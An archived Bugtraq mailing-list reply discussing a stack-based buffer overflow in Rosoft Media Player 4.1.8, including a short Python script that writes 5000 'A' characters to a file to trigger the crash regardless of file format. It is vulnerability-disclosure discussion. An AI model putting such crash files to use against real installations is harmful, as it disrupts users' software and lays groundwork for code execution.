Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: Re: Re: Rosoft Media Player 4.1.8 RML Stack Based Buffer Overflow

Re: Re: Rosoft Media Player 4.1.8 RML Stack Based Buffer Overflow

From: <opexoc_at_gmail.com>
Date: 17 Mar 2008 23:27:31 -0000
('binary' encoding is not supported, stored as-is) >> I know this because I "tasted" the exploit without extension.

Actually, this is not the proof that the vulnerability is not connected with format, because program could read the file and judge that if this program has M3U format or RML or something else. But if we try following code we are sure:

#!/usr/bin/python
content = (
"A" * 5000 + "\n"
)

fd = open("music","w");
fd.write(content)
fd.close();
print "FILE CREATED"

Wiktor
Received on Mar 18 2008

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]